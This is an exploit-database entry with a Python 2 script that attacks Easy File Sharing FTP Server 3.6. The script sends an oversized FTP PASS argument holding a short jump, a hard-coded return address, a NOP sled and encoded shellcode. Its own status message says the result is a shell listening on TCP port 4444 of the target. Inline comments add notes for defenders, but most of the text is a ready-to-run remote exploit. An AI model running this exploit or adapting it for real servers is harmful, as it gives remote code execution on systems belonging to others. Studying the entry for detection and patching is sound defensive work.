Easy File Sharing FTP Server 3.6 stack buffer overflow Exploit

2016-11-11T00:00:00
ID 1337DAY-ID-26310
Type zdt
Reporter Achilles
Modified 2016-11-11T00:00:00

Description

Exploit for the Windows platform, in the remote exploits category.

                                        
#!/usr/bin/env python
# Exploit Title: Easy File Sharing FTP Server 3.6 stack buffer overflow
# Date: 11.11.2016
# Exploit Author: ACHILLES
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.efssoft.com/ftpserver.htm
# Version: 3.6
# Tested on: Windows 8.1 Enterprise , English
#          : Windows 7 Enterprise SP1, English
#          : Windows XP SP3, English
#
import socket
import struct
import os
import time

# Proof-of-concept for the overflow named in the header: one oversized
# argument to the FTP PASS command, sent without valid credentials.
# The script is Python 2 only (raw_input, print statements, byte strings
# built as str).
#
# Defender notes, all derived from the code below:
#   * The trigger is a PASS line well over 2,500 bytes long, made of a long
#     run of "A", runs of 0x90 and other non-printable bytes. Real passwords
#     are nowhere near that size, so a length or printable-character check on
#     FTP command lines in an IDS or proxy separates this from normal logins.
#   * Only network reach to TCP 21 is needed; the username sent is
#     "anonymous".
#   * The page names only version 3.6 as affected and gives no fixed version.

# Opaque machine code placed at the end of the PASS argument. It is not
# decoded here; the status message printed further down points at TCP 4444
# on the target, so presumably it opens a listener there -- confirm in a
# sandbox before relying on that as an indicator.
shellcode = ( 
"\xbf\xd0\x8a\x44\x2d\xd9\xc3\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x53\x31\x7d\x12\x83\xed\xfc\x03\xad\x84\xa6\xd8\xb1"
"\x71\xa4\x23\x49\x82\xc9\xaa\xac\xb3\xc9\xc9\xa5\xe4\xf9"
"\x9a\xeb\x08\x71\xce\x1f\x9a\xf7\xc7\x10\x2b\xbd\x31\x1f"
"\xac\xee\x02\x3e\x2e\xed\x56\xe0\x0f\x3e\xab\xe1\x48\x23"
"\x46\xb3\x01\x2f\xf5\x23\x25\x65\xc6\xc8\x75\x6b\x4e\x2d"
"\xcd\x8a\x7f\xe0\x45\xd5\x5f\x03\x89\x6d\xd6\x1b\xce\x48"
"\xa0\x90\x24\x26\x33\x70\x75\xc7\x98\xbd\xb9\x3a\xe0\xfa"
"\x7e\xa5\x97\xf2\x7c\x58\xa0\xc1\xff\x86\x25\xd1\x58\x4c"
"\x9d\x3d\x58\x81\x78\xb6\x56\x6e\x0e\x90\x7a\x71\xc3\xab"
"\x87\xfa\xe2\x7b\x0e\xb8\xc0\x5f\x4a\x1a\x68\xc6\x36\xcd"
"\x95\x18\x99\xb2\x33\x53\x34\xa6\x49\x3e\x51\x0b\x60\xc0"
"\xa1\x03\xf3\xb3\x93\x8c\xaf\x5b\x98\x45\x76\x9c\xdf\x7f"
"\xce\x32\x1e\x80\x2f\x1b\xe5\xd4\x7f\x33\xcc\x54\x14\xc3"
"\xf1\x80\x81\xcb\x54\x7b\xb4\x36\x26\x2b\x78\x98\xcf\x21"
"\x77\xc7\xf0\x49\x5d\x60\x98\xb7\x5e\x9f\x05\x31\xb8\xf5"
"\xa5\x17\x12\x61\x04\x4c\xab\x16\x77\xa6\x83\xb0\x30\xa0"
"\x14\xbf\xc0\xe6\x32\x57\x4b\xe5\x86\x46\x4c\x20\xaf\x1f"
"\xdb\xbe\x3e\x52\x7d\xbe\x6a\x04\x1e\x2d\xf1\xd4\x69\x4e"
"\xae\x83\x3e\xa0\xa7\x41\xd3\x9b\x11\x77\x2e\x7d\x59\x33"
"\xf5\xbe\x64\xba\x78\xfa\x42\xac\x44\x03\xcf\x98\x18\x52"
"\x99\x76\xdf\x0c\x6b\x20\x89\xe3\x25\xa4\x4c\xc8\xf5\xb2"
"\x50\x05\x80\x5a\xe0\xf0\xd5\x65\xcd\x94\xd1\x1e\x33\x05"
"\x1d\xf5\xf7\x35\x54\x57\x51\xde\x31\x02\xe3\x83\xc1\xf9"
"\x20\xba\x41\x0b\xd9\x39\x59\x7e\xdc\x06\xdd\x93\xac\x17"
"\x88\x93\x03\x17\x99"
)
# PASS argument layout: a leading comma (0x2c), then 2559 bytes of "A" filler.
payload = "\x2c"
payload += "A"*2559
# Four bytes: an x86 short jump (EB 19) plus two NOPs. The jump lands in the
# 0x90 run added below, skipping the address that follows.
payload += "\xeb\x19\x90\x90"               
# Hard-coded 32-bit little-endian address. The page does not say which module
# it belongs to; a fixed address suggests the author relies on an image that
# is not relocated -- TODO confirm against the installed binaries.
payload += struct.pack("<I", 0x10017F21)    
# 30 NOP bytes, then the opaque machine code defined above.
payload += "\x90"*30
payload += shellcode
# Plain TCP connection to the FTP control port of the host typed at the prompt.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
print "[+]Sending the Shellcode"
# Read and discard up to 1024 bytes of the server's greeting.
s.recv(1024)
# Status text only: names TCP 4444 on the target as the place to look after
# the PASS line has been sent.
print "[+]nc " + server + ":4444 and check the shell"
print "\r"
# Replies to USER and PASS are read and discarded; nothing checks whether the
# server accepted either command.
s.send("USER anonymous\r\n")
s.recv(1024)
# The oversized argument travels on this single PASS line.
s.send("PASS " + payload + "\r\n")
s.recv(1024)
s.close()
